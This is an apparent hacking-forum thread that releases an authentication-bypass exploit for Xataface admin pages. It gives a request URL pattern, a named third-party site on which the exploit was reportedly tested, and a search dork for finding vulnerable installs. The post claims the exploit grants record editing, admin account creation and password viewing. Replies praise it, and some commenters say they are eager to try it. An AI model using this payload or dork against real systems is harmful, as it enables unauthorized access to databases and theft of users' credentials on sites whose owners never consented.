Have an account?
It looks like you're new here. If you want to get involved, click one of these buttons!
Apply for Membership
Who's Online (0)
Looking to introduce yourself? Look no further, and click here! We also have IRC! [irc.evilzone.org #iexploit]
Web Application Security
[Private] Exploit! Xataface Admin auth bypass vulnerability!
Xataface Admin Auth Bypass Vulnerability
#[+] Discovered by : Xinapse
#[+] Site : firewire-security.com
#[+] Email :
#[+] Vulnerability : Admin/database auth bypass vulnerability
#[+] Software : Xataface - open source GPL, PHP, Mysql database software
#[+] Vendor :
#[+] Usage :
http://www.site.com/admin.php?-action=v ... -mode=list
#[+] Tested on :
http://www.journeytherapeut.com/admin.p ... -mode=list
#[+] Alert : Most of the sites i tried running this software are vulnerable, only a few used .htaccess
#[+] Dork :"powered by dataface" "powered by xataface"
#[+] Description : With this i could edit/delete/create records in the database, create new admin accounts and view all the users and passwords.
#[+] Greetz :firewire-security team, b10h4z4rd, g3org3
Nice release! I tried testing it but got no luck XD
Lol its definitely not private anymore its all over the web
And Inj3ct0r.com is claiming it as their own
What the FUCK, who owns fucking inj3ct0r.com (and its all over the web) as i submitted to packetstorm , milw0rm, exploit-db and security focus
lol i wouldnt call it "Private" if you submitted it everywhere...just saying :)
was private when it was uploaded,
nice share Xinapse! thanks
Thanks :P yeah i was pleased with myself
Desert Fox ™
Nice share I cant wait to try it!
Add a Comment